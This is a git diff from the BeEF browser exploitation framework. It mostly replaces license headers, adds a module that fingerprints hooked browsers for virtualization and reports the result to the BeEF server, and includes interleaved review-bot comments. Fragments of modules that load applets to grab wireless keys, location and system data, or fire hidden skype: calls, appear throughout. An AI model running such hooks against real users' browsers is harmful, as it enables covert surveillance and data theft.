2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { // Initialize 
diff --git a/modules/host/detect_protocol_handlers/config.yaml b/modules/host/detect_protocol_handlers/config.yaml index a3de123a2..60ec6d67d 100644 --- a/modules/host/detect_protocol_handlers/config.yaml +++ b/modules/host/detect_protocol_handlers/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/detect_protocol_handlers/module.rb b/modules/host/detect_protocol_handlers/module.rb index 13a295ac1..df7b205ff 100644 --- a/modules/host/detect_protocol_handlers/module.rb +++ b/modules/host/detect_protocol_handlers/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # # Some additional protocol handlers # # ChromeHTML, code, Explorer.AssocProtocol.search-ms, FirefoxURL, gopher, icy, ie.http, ie.https, ie.ftp, iehistory, ierss, irc, itms, magnet, mapi, mms, mmst, mmsu, msbd, msdigitallocker, nntp, opera.protocol, outlook, pcast, rlogin, sc, search, search-ms, shout, skype, snews, steam, stssync, teamspeak, tel, telnet, tn3270, ts3file, ts3server, unsv, uvox, ventrilo, winamp, WindowsCalendar.UrlWebcal.1, WindowsMail.Url.Mailto, WindowsMail.Url.news, WindowsMail.Url.nntp, WindowsMail.Url.snews, WMP11.AssocProtocol.MMS, wpc diff --git a/modules/host/detect_software/command.js b/modules/host/detect_software/command.js index 5abaac7a5..4ef214605 100644 --- a/modules/host/detect_software/command.js +++ b/modules/host/detect_software/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var files = [ diff --git a/modules/host/detect_software/config.yaml b/modules/host/detect_software/config.yaml index 4a0ff900c..7c44db54a 100644 --- a/modules/host/detect_software/config.yaml +++ b/modules/host/detect_software/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: 
diff --git a/modules/host/detect_software/module.rb b/modules/host/detect_software/module.rb index df587f431..b35f81c24 100644 --- a/modules/host/detect_software/module.rb +++ b/modules/host/detect_software/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_software < BeEF::Core::Command diff --git a/modules/host/detect_vm/command.js b/modules/host/detect_vm/command.js new file mode 100644 index 000000000..a22df9951 --- /dev/null +++ b/modules/host/detect_vm/command.js 
@@ -0,0 +1,56 @@
+//
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Written by Jeremiah Grossman
+// Ported to BeEF by bcoles
+// For more information see http://jeremiahgrossman.blogspot.com.au/2009/08/web-pages-detecting-virtualized.html
+
+beef.execute(function() {
+
+ var result;
+ var dimensions = {
+ '320, 200' : '',
+ '320, 240' : '',
+ '640, 480' : '',
+ '800, 480' : '',
+ '768, 576' : '',
+ '854, 480' : '',
+ '1024, 600' : '',
+ '1152, 768' : '',
+ '800, 600' : '',
+ '1024, 768' : '',
+ '1280, 854' : '',
+ '1280, 960' : '',
+ '1280, 1024' : '',
+ '1280, 720' : '',
+ '1280, 768' : '',
+ '1366, 768' : '',
+ '1280, 800' : '',
+ '1440, 900' : '',
+ '1440, 960' : '',
+ '1400, 1050' : '',
+ '1600, 1200' : '',
+ '2048, 1536' : '',
+ '1680, 1050' : '',
+ '1920, 1080' : '',
+ '2048, 1080' : '',
+ '1920, 1200' : '',
+ '2560, 1600' : '',
+ '2560, 2048' : ''
+ };
+
+ var wh = screen.width + ", " + screen.height;
+
+ if (dimensions[wh] != undefined) {
+ result = "Not virtualized";
+ } else {
+ result = "This host is virtualized or uses an unrecognized screen resolution";
+ }
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+result);
+
+});
+
diff --git a/modules/host/detect_vm/config.yaml b/modules/host/detect_vm/config.yaml new file mode 100644
index 000000000..8ee182664
--- /dev/null
+++ b/modules/host/detect_vm/config.yaml
@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+ module:
+ detect_virtualization:
+ enable: true
+ category: "Host"
+ name: "Detect Virtual Machine"
+ description: "This module uses the host screen resolution as a cheap and easy method to check if the browser is running in a virtual environment.
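Review bot: The `"Not virtualized"` result in the `if (dimensions[wh] != undefined)` branch of detect_vm/command.js states more than the check can show. A guest whose display is set to one of the listed sizes takes the same branch, and a physical machine with an unlisted size, or a browser that may report scaled `screen.width`/`screen.height` values, falls into the other one. I would word both results as what was observed, for example `result = "Screen resolution " + wh + " is a common physical display size";`, and leave the conclusion to the person reading the result. The lookup would also read more clearly as `if (dimensions.hasOwnProperty(wh)) {` than as a loose comparison with `undefined`. A short comment above `dimensions` saying that the keys are "width, height" strings and the values are unused would help the next reader.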

Unusual screen resolutions, such as those used by wide screen televisions or hand-held devices, may result in false negative results." + authors: ["Jeremiah Grossman", "bcoles"] + target: + working: ["All"] diff --git a/modules/host/detect_vm/module.rb b/modules/host/detect_vm/module.rb new file mode 100644 index 000000000..0ed2c01e3 --- /dev/null +++ b/modules/host/detect_vm/module.rb @@ -0,0 +1,14 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Detect_virtualization < BeEF::Core::Command + + def post_execute + content = {} + content['result'] = @datastore['result'] if not @datastore['result'].nil? + save content + end + +end diff --git a/modules/host/get_internal_ip/command.js b/modules/host/get_internal_ip/command.js index 9d207c1d1..575322055 100755 --- a/modules/host/get_internal_ip/command.js +++ b/modules/host/get_internal_ip/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var applet_uri = 'http://'+beef.net.host+ ':' + beef.net.port + '/'; 
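Review bot: `working: ["All"]` in detect_vm/config.yaml is spelled differently from the `working: ["ALL"]` used by the other module configs in this commit (zenoss_daemon_csrf and detect_google_desktop, for example). Whether target matching is case-sensitive cannot be seen from here, but if it is, the module would not be listed as working for any browser, so I would write `working: ["ALL"]`. The module key `detect_virtualization`, and the class `Detect_virtualization` in module.rb, also differ from the directory name `detect_vm`, while the other modules shown use one name for all three; it is worth confirming that the loader does not rely on them matching. In the description, an unusual resolution leads to the "virtualized" result, so "false negative results" should probably read "false positive results".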
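Review bot: `post_execute` in detect_vm/module.rb saves `@datastore['result']` exactly as the remote browser sent it, although command.js only ever sends one of two fixed strings. Because the value comes from the remote page and is presumably shown later in the operator's console, I would accept only the expected values: define `known = ['Not virtualized', 'This host is virtualized or uses an unrecognized screen resolution']` and then use `content['result'] = @datastore['result'] if known.include?(@datastore['result'])`. How `save` treats the content is not visible in this hunk, so the risk is inferred rather than shown. As a style point, `if not @datastore['result'].nil?` reads better as `unless @datastore['result'].nil?`.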
diff --git a/modules/host/get_internal_ip/config.yaml b/modules/host/get_internal_ip/config.yaml index 68a4d63c3..9cb6d2072 100755 --- a/modules/host/get_internal_ip/config.yaml +++ b/modules/host/get_internal_ip/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_internal_ip/get_internal_ip.java b/modules/host/get_internal_ip/get_internal_ip.java index 2882d1de1..f783260a3 100755 --- a/modules/host/get_internal_ip/get_internal_ip.java +++ b/modules/host/get_internal_ip/get_internal_ip.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.applet.Applet; import java.applet.AppletContext; import java.net.InetAddress; diff --git a/modules/host/get_internal_ip/module.rb b/modules/host/get_internal_ip/module.rb index cb950806a..5f6948506 100755 --- a/modules/host/get_internal_ip/module.rb +++ b/modules/host/get_internal_ip/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_internal_ip < BeEF::Core::Command diff --git a/modules/host/get_physical_location/command.js b/modules/host/get_physical_location/command.js index 9fb382db4..4047325e3 100755 --- a/modules/host/get_physical_location/command.js +++ b/modules/host/get_physical_location/command.js 
@@ -1,18 +1,9 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/getGPSLocation.jar'; var applet_id = '<%= @applet_id %>'; diff --git a/modules/host/get_physical_location/config.yaml b/modules/host/get_physical_location/config.yaml index afbb27215..49f7b48b2 100755 --- a/modules/host/get_physical_location/config.yaml +++ b/modules/host/get_physical_location/config.yaml 
@@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_physical_location: diff --git a/modules/host/get_physical_location/getGPSLocation.java b/modules/host/get_physical_location/getGPSLocation.java index 0a1fb02ad..8491a7895 100755 --- a/modules/host/get_physical_location/getGPSLocation.java +++ b/modules/host/get_physical_location/getGPSLocation.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/modules/host/get_physical_location/module.rb b/modules/host/get_physical_location/module.rb index 17f4723fb..7136a52e4 100755 --- a/modules/host/get_physical_location/module.rb +++ b/modules/host/get_physical_location/module.rb 
@@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + require 'rubygems' require 'json' require 'open-uri' diff --git a/modules/host/get_registry_keys/command.js b/modules/host/get_registry_keys/command.js index df90099bc..c0bb9377d 100644 --- a/modules/host/get_registry_keys/command.js +++ b/modules/host/get_registry_keys/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var internal_counter = 0; 
diff --git a/modules/host/get_registry_keys/config.yaml b/modules/host/get_registry_keys/config.yaml index fda7b3d7a..9d0ef23a4 100644 --- a/modules/host/get_registry_keys/config.yaml +++ b/modules/host/get_registry_keys/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/get_registry_keys/module.rb b/modules/host/get_registry_keys/module.rb index 07d4e4d17..f8a530b52 100644 --- a/modules/host/get_registry_keys/module.rb +++ b/modules/host/get_registry_keys/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_registry_keys < BeEF::Core::Command diff --git a/modules/host/get_system_info/command.js b/modules/host/get_system_info/command.js index 9eea6fb32..6e8f6c1bd 100644 --- a/modules/host/get_system_info/command.js +++ b/modules/host/get_system_info/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var internal_counter = 0; 
diff --git a/modules/host/get_system_info/config.yaml b/modules/host/get_system_info/config.yaml index 802db1695..1c7c1ca21 100644 --- a/modules/host/get_system_info/config.yaml +++ b/modules/host/get_system_info/config.yaml @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,6 +14,6 @@ beef: target: not_working: ALL: - os: ["iPhone", "Macintosh"] + os: ["iOS", "Macintosh"] working: ["O", "FF", "S", "IE"] user_notify: ["C"] diff --git a/modules/host/get_system_info/getSystemInfo.java b/modules/host/get_system_info/getSystemInfo.java index e6f0f06f4..1d07209f2 100644 --- a/modules/host/get_system_info/getSystemInfo.java +++ b/modules/host/get_system_info/getSystemInfo.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.applet.*; import java.awt.*; import java.net.*; diff --git a/modules/host/get_system_info/module.rb b/modules/host/get_system_info/module.rb index 128db8a54..2511eedc6 100644 --- a/modules/host/get_system_info/module.rb +++ b/modules/host/get_system_info/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_system_info < BeEF::Core::Command diff --git a/modules/host/get_wireless_keys/command.js b/modules/host/get_wireless_keys/command.js index 54aec9505..350d70552 100644 --- a/modules/host/get_wireless_keys/command.js +++ b/modules/host/get_wireless_keys/command.js 
@@ -1,18 +1,9 @@ -// -// Copyright 2011 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. -// +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + beef.execute(function() { var applet_archive = 'http://'+beef.net.host+ ':' + beef.net.port + '/wirelessZeroConfig.jar'; var applet_id = '<%= @applet_id %>'; diff --git a/modules/host/get_wireless_keys/config.yaml b/modules/host/get_wireless_keys/config.yaml index 6bf1f7159..834c47a50 100644 --- a/modules/host/get_wireless_keys/config.yaml +++ b/modules/host/get_wireless_keys/config.yaml 
@@ -1,18 +1,9 @@ # -# Copyright 2011 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # + beef: module: get_wireless_keys: diff --git a/modules/host/get_wireless_keys/module.rb b/modules/host/get_wireless_keys/module.rb index 0a3f75be2..73bbe20b6 100644 --- a/modules/host/get_wireless_keys/module.rb +++ b/modules/host/get_wireless_keys/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Get_wireless_keys < BeEF::Core::Command 
diff --git a/modules/host/get_wireless_keys/wirelessZeroConfig.java b/modules/host/get_wireless_keys/wirelessZeroConfig.java index 8349d64a2..5e05365dd 100644 --- a/modules/host/get_wireless_keys/wirelessZeroConfig.java +++ b/modules/host/get_wireless_keys/wirelessZeroConfig.java @@ -1,3 +1,9 @@ +/* + * Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net + * Browser Exploitation Framework (BeEF) - http://beefproject.com + * See the file 'doc/COPYING' for copying permission + */ + import java.io.*; import java.util.*; import java.net.*; diff --git a/modules/host/hook_default_browser/command.js b/modules/host/hook_default_browser/command.js index 2e565a778..e765a693a 100644 --- a/modules/host/hook_default_browser/command.js +++ b/modules/host/hook_default_browser/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var pdf_url = 'http://'+beef.net.host+ ':' + beef.net.port + '/report.pdf'; diff --git a/modules/host/hook_default_browser/config.yaml b/modules/host/hook_default_browser/config.yaml index 0033717ba..7d5bd425f 100644 --- a/modules/host/hook_default_browser/config.yaml +++ b/modules/host/hook_default_browser/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,6 +14,6 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["All"] user_notify: ["FF", "C"] diff --git a/modules/host/hook_default_browser/module.rb b/modules/host/hook_default_browser/module.rb index bcb1488fb..e5ea146af 100644 --- a/modules/host/hook_default_browser/module.rb +++ b/modules/host/hook_default_browser/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Hook_default_browser < BeEF::Core::Command diff --git a/modules/host/insecure_url_skype/command.js b/modules/host/insecure_url_skype/command.js index 6521d73bc..8e3df94e6 100644 --- a/modules/host/insecure_url_skype/command.js +++ b/modules/host/insecure_url_skype/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var sploit = beef.dom.createInvisibleIframe(); sploit.src = 'skype:<%= @tel_num %>?call'; diff --git a/modules/host/insecure_url_skype/config.yaml b/modules/host/insecure_url_skype/config.yaml index cb35a4c23..a3a3eb9f2 100644 --- a/modules/host/insecure_url_skype/config.yaml +++ b/modules/host/insecure_url_skype/config.yaml @@ -1,17 +1,7 @@ # -# 